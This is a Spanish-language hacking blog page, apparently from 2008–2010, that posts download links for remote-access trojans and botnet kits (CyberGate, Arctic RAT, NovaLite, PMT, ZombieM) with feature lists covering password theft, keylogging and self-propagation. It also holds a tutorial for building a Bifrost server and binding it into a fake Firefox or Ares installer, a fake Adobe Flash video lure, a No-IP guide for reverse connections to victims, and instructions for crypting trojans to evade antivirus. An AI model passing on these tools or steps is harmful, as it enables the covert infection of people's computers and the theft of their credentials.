Mostrando entradas con la etiqueta troyanos. Mostrar todas las entradas
Mostrando entradas con la etiqueta troyanos. Mostrar todas las entradas

01 mayo 2010

CYBER GATE [Versiones Actuales]



El troyano Ciber Gate en todas sus versiones. ¿Por que pongo todas sus versiones? Si sólo interesa la mas reciente...
Pues porque a veces algunas versiones antiguas aunque no tengan tantas cosas suelen ser mas estables.
Por lo tanto si tenéis mala conexión o no os llegan las conexiones remotas. La respuesta es que está algo mal configurado o es cosa de la inestabilidad de un server.
Si es por lo segundo ya sabéis que hacer.

Muchas gracias a ASH-LABS por el Malware.

Saludos

Descarga

En caso de que no funcione decidlo en comentarios



http://espacioforos.miarroba.com/1433606/agradeser.gifAgradecer no cuesta nada, Valora los aportes de los demas y si te ha sido de utilidad comenta!!

08 abril 2010

Arctic R.A.T. 0.0.1 Alpha




- Server Builder 100% (not tested on X64 OS)
- Persistance 90% (I will add an extra thread for more peristance)
- Injection 100% (Injection seems to be Stable)
- Process Manager 10% (only GUI!)

Descarga




http://espacioforos.miarroba.com/1433606/agradeser.gif
Agradecer no cuesta nada, Valora los aportes de los demas
y si te ha sido de utilidad comenta!!

07 abril 2010

Bifrost Attacker v1.1 Beta



Bifrost Attacker es un flooder para bifrost, sirve para cerrar el cliente de un bifrost remoto saturandolo de conexiones. Es ideal para cuando sabemos que alguien nos quizo infectar o nos infecto con el troyano bifrost, colocando la ip o no-ip del atacante.

Para usarlo solo se coloca la ip y puerto de quien esta usando bifrost y despues click en "attack". La ip y el puerto lo podemos obtener con algun programa que desencripte el EOF del bifrost como el "sacacorchos", con el comando "netstat" en ms-dos, o con cualquier programa que analize las conexiones de red.

Su uso es muy simple, solo colocar la direccion de la web a atacar y "enter" 2 veces. Necesitan tener java instalado, lo pueden descargar en el siguiente link http://www.java.com/es/download/

Descarga

Cr.BotWeb (rapidshare)
Cr.BotWeb (megaupload)
Cr.BotWeb (filefactory)
Contraseña del rar: troyanosyvirus.com.ar



http://espacioforos.miarroba.com/1433606/agradeser.gif
Agradecer no cuesta nada, Valora los aportes de los demas
y si te ha sido de utilidad comenta!!

02 abril 2010

NovaLite v1.1







NovaLite v1.1 (Nueva Version)nueva version de este troyano parecido al bifrost. Concexiones mas rápidas que el poison.

nuevo en esta version:
Save last builder setting
Auto listen on startup
View download url progressMouse Clicks
Keyboard Press



Descarga









http://espacioforos.miarroba.com/1433606/agradeser.gif
Agradecer no cuesta nada, Valora los aportes de los demas
y si te ha sido de utilidad comenta!!






PMT(Phoenix Messenger Trojan) es un troyano/RAT creado por SMT que funciona mediante el msn, es decir, el cliente le envia commandos (palabras) a la pc anfitriona que esta logueada en una cuenta msn y ejecutando procesos u/o acciones. Es asi como realmente funciona un troyano, me refiero que ustedes al hacer clic en un boton de su troyano (el que usan) estan enviando una palabra con parametros para compararla a una lista que esta en la pc anfitriona. Su funcionamiento es como el del KMT (Karcrack Messenger Trojan). Es muy facil de usar.

Comandos:
STM*\Texto\Titulo ( Show Text Message ) Muestra un mensaje
SFF*\Ruta Archivo[-] ( Search For File ) Busca si exciste un archivo
UFD*\Web Archivo\RutaArchivo[-] ( Url Download File ) Nos permite descargar un archivo de una URL
TOB* ( Turn Off Bot ) Cierra el Bot
DST* ( Desable System TaskM. ) Deshabilita el Administrador de tareas
DSR* ( Desable Sysmte Regedit ) Deshabilita el Registro
GSI* ( Get System Information ) Nos devuelve informacion de la OC
GPC* ( Get Program Command ) Devuelve los comandos del programa
UPC* ( Usage Program Commands ) Devuelve la manera de usar correctamente los comandos del programa para evitar errores
PAT* ( Program About Text ) Devuelve el about del programa
ECC*\Comando\HideOrShow ( Execute CMD Command ) Ejecuta un comando del CMD
DRF*\Ruta Archivo[-] ( Delete Remote File ) Borra un archivo del sistema
ERF*\Ruta Archivo[-] ( Execute Remote File ) Ejecuta un archivo del sistema


Muchas Gracias a ASH-LABS

Descarga







http://espacioforos.miarroba.com/1433606/agradeser.gif
Agradecer no cuesta nada, Valora los aportes de los demas
y si te ha sido de utilidad comenta!!

01 abril 2010

ZombieM Bot 2.0





Funciones Basicas
ZombieM bot posee las funciones basicas para administrar los archivos de las pcs conectadas:
-Descargar archivo / Descargar y ejecutar
-Ejecutar archivo / Comandos
-Crear carpetas
-Borrar archivo
-Borrar carpeta
-Genera archivos con contenido (bat, txt, inf, reg,etc)
-Actualizar servidor

Contraseñas
ZombieM captura y guarda las contraseñas de:
-Todas las versiones de MSN messenger
-Firefox 3
-Internet explorer 6 y 7 (usando plugin)Spread
- Propagacion
-Propagacion P2P: Se copia a las carpetas para compartir de los programas P2P mas conocidos (Ares, emule, limewire, etc).
Detecta las carpetas para compartir desde el registro de windows, y copia un archivo definido por el usuario
-que puede ser descargado por el mismo
- o el mismo bot. Se puede escribir el nombre del archivo a compartir.
-Propagacion MSN: Envia mensajes a todos los contactos del MSN de los bots conectados. El usuario escribe el mensaje que quiere enviar y el intervalo de tiempo que tarda en enviar el mensaje entre contacto y contacto.
-Propagacion USB/DISCOS: Se copia a todos los discos extraibles y locales: Pendrives, mp3, mp4, celulares, camaras, memorias, etc.
-Propagacion LAN: Detecta 3 tipos de vulnerabilidades en la red de los bot conectados y aprovechas dichas vulenrabilidades para copiarse a las pcs de esa red, por ejemplo por Netbios. Creacion de Scripts (batch, VBS, etc)ZombieM permite crear script de cualquier tipo como por ejemplo en batch o visual basic script para despues ejecutarlos.Modifica archivo HostsZombieM detecta la ubicacion del archivo Hosts de windows y lo modifica a gusto del usuario para que las pcs al ingresar a ciertas paginas webs las redireccione a otra o simplemente evitar que ingresen en dicha web. Se puede usar en una empresa para que los empleados al ingresar a una web prohibida por la empresa sea redireccionado a otra web, o para que niños no ingresen a paginas webs para adultos.Usar esta tarea para otros fines puede ser ilegal en algunos paises, y solo el usuario del bot se hace responsable de dicho acto.

Otras tareas
-Shell remota
-Visitar web en primer plano
-Enviar mensaje
-Opciones de servidor: Actualizar, reconectar, desconectar, cerrar, eliminar.


Muchas Gracias a ASH-LABS por compartirlo con nosotros.

Descarga




http://espacioforos.miarroba.com/1433606/agradeser.gif
Agradecer no cuesta nada, Valora los aportes de los demas
y si te ha sido de utilidad comenta!!

28 febrero 2009

Tutorial Bifrost + Elite Fake Creator

Hola a todos hoy les traigo un tutorial sobre como crear el server del troyano Bifrost y hacer un fake con el Elite Fake Creator.

Espero que les sea de utilidad, y como siempre agradeciendo por visitar el blog :D

Bien a trabajar : Nos descargamos el Bifrost y el Elite Fake Creator (de los en

Descomprimimos en una carpeta el Bifrost y en otra el Elite Fake Creator.

Abrimos la carpeta del Bifrost y nos aparecera esta ventana con todos estos iconos :

Abrimos el Bifrost y nos saldra una ventana asi :

Vamos a Build abajo el segundo boton : y nos saldra esta ventana :

En DNS/IP ponemos nuestro No-ip y le dan a ADD . Pasamos a la otra pestaña de arriva Intallation y se nso cambiara la ventana a esta :

Abajo de "file intallation" tiene las opciones para elegir en donde quiere que se guarde el servidor . Abajo "autostar at reboot" le dan un par de veces a "Ramdom Key ".

Arriba al lado de "Intllation" tenemos "Extension disc" si queres incluir la extencion de "pack" la clikean . Abajo el keylogger lo activamos abajo "injection" es para penetrar en un proceso por ej : opera.exe . Mas abajo el nombre con el cual se conectara la victima y el ultimo persistencia del server recomiendo no ponerlo :)

Vamos a la otra pesataña de arriva Stealth nos aparecera asi :

En "Stealth mode" lo dejamos como esta . Al lado donde dice "Delayed Connection" lo dejamos como esta , abajo en el lugar de "rookin" no lo activamos y lo demas tampoco activamos, nada por que el server no puede llegar a andar :) Le damos a build abajo al costado y lo guardan donde tiene su server del Bifrost y ya tenemos nuestro server configurado y guardado.

Ahora vamos a ir a la carpeta del Elite Fake Creator nos aparecera una ventana asi :

Le damos doble click a Creator y nso aparecera esta ventana :

Vamos a ir a archivos adjuntos en los tres puntitos clickeamos y seleccionamos el server del Bifrost y abajo ahi varios Fakes yo selecciones el Mozilla FireFox . Pero pueden seleccionar el mas comun que es el del Ares ya que mas de 1000 de personas descargar del ares xD , le dan a Crear Fake In talador y o guardan :

Vamos a la carpeta donde guardamos el Fake y ya esta tenemos nuestro fake listo para subir al Ares,Emule,ETC

Un saludo Ju4ck3r

Descarga

http://espacioforos.miarroba.com/1433606/agradeser.gif
Agradecer no cuesta nada, Valora los aportes de los demas
y si te ha sido de utilidad comenta!!

21 noviembre 2008

algunas opciones de descarga!

Si alguien desea troyanos indetectables a cualquier antivirus me contacta.

Troyanos


[pertenecen a nuestro amigo blog troyanosyvirus]

http://espacioforos.miarroba.com/1433606/agradeser.gif
Agradecer no cuesta nada, Valora los aportes de los demas :P
y si te ha sido de utilidad comenta!!

[Optimizado] Propaga tus troyanos y virus por videos

Optimizado
Con esta sección podremos poseer de una herramienta más para poder propagar nuestros "servers", la página contiene un completo sistema para propagar un server a traves de un link de un video que dará una alerta el Active X, que pedirá que se instale el adobe flash, luego de esa instalación el programa dirá que se refresque la pagina y se mostrará el video para evitar sospechas!

Es obvio que nuestro server esta unido con el 'instalador de adobe flash' y que lo hemos subido a un ftp.

Links:
Primera version:
URL Video Installer

Segunda version (Optimizada, reproduce el video despues de la suspuesta instalacion)
http://usuarios.lycos.es/YouVideo/Installer.php

Nota: Los IDs vencen cada 48 horas
Otros:
Manual para Crear FTP en Lycos

Imagen - correspondiente a la segunda version (click para agrandar):

Eres programador de VB? o tienes tu pagina web? quieres el codigo fuente?
quieres sacarle provecho a este servicio? ?
visita este link

Agradecimiento:
Hack_Zero: El Fake de la instalacion de Adobe Flash
Kizar: La base fundamental del segundo codigo de la barra ActiveX
Que te parecio?


Temporalmente off

http://espacioforos.miarroba.com/1433606/agradeser.gif
Agradecer no cuesta nada, Valora los aportes de los demas :P
y si te ha sido de utilidad comenta!!

Manual NO-IP para conexion inversa en troyanos

Si Usamos troyanos de Conexion Inversa como el Bifrost es Bueno tener un Dominio NO-IP, porque si Poseemos IP Dinamica (Nuestra IP cambia cada ves que nos conectamos a Internet), perderemos la Conexion con nuestra Victima, porque la Victima se conecta a nosotros, no nosotros a ella. Si Usamos el NO-IP no tendremos el Problema de perder la Conexion porque automaticamente se redirecciona a nuestra Nueva IP.
Otra ventaja es que puedes conectarte desde otra PC con tu cuenta asi podes recibir las notificaciones a esa otra PC.
Para tener el servicio de no ip debes seguir los siguientes pasos.

Paso 1 (registrarse): Debes registrarte en no-ip para ello entra en www.no-ip.com y pulsa sobre Sign up now!.


Una vez q te registraste debes activar la cuenta pulsando en el link que te envian a tu correo, logueate en la página poniendo tu email y password.


Paso 2 (agregar un host): Pulsa sobre el botón ADD en el panel de la izquierda.






En hostname pon lo que quieras, por ejemplo: troyanosyvirus y elige algunos de los host's que ponen ahi, por ejemplo no-ip.org da igual cuál sea. En Host Tipe deja DNS (A) y deberá aparecer tu IP en IPadresses. El resto dejalo como está y dale a create host.
En un minuto o menos debería estar.




Paso 3 (Descarga): Ahora vete a downloads y descarga el DUCK para windows
(o pulsa aquí: http://www.download.com/3000-2165-10055182.html?legacy=cnet )



Instala este programa, que tendras que tener abierto siempre que uses un troyano con conexion inversa.

Paso 4 (Ejecucion): Abre el no-ip duc (el que bajaste) y te pedira tu email y password (coloca el mismo con el que te registraste). Una vez que te loggees en el programa deberá aparecerte algo como: tudominio.no-ip.org . Cliquea sobre la carita feliz hasta que se ponga asi: XD y entonces estarás conectado.




Eso es todo! ya tienes no-ip funcionando y listo para usar.
Cada vez que te quieras conectar con un troyano de conexion inversa coloca el host que te creaste (puedes tener varios si quieres tambien).

http://espacioforos.miarroba.com/1433606/agradeser.gif
Agradecer no cuesta nada, Valora los aportes de los demas :P
y si te ha sido de utilidad comenta!!

Hackear msn [ Hackear hotmail, troyanos, themida]




Aqui un pequeño tutorial hecho por un amigo mio de Mexico!
espero que lo disfruten!




http://espacioforos.miarroba.com/1433606/agradeser.gif
Agradecer no cuesta nada, Valora los aportes de los demas :P
y si te ha sido de utilidad comenta!!

TuToRiAL EncRiPTaR TrOyAnO (HaCeRLo InDeTecTaBLe)

Este es un pequeño tutorial que me encontre navegando por youtube!! seee.


descargaslas descargas que han sido utilizadas en este video son las siguientes.
Link Themida
http://rapidshare.com/files/61261540/Themida.rar
Link Joiner
http://rapidshare.com/files/70677826/Joiner_by_H4CK3R-Z3R0.rar


http://espacioforos.miarroba.com/1433606/agradeser.gif
Agradecer no cuesta nada, Valora los aportes de los demas :P
y si te ha sido de utilidad comenta!!

Licencia Ju4ck3r's Blog ® Copyleft 2009

Creative Commons License
Ju4ck3r's Blog by El-ju4ck3r is licensed under a Creative Commons Reconocimiento-No comercial-Compartir bajo la misma licencia 3.0 España.
Based on a work at WwW.El-JuAcKeR.CoM.aR.Permissions beyond the scope of this license may be available at Rocke_x1x@hotmail.com.
Copyleft 2009 | Blogger Template by Ju4ck3r | Design by Ju4ck3r No part of the content or the blog may be reproduced without prior written permission.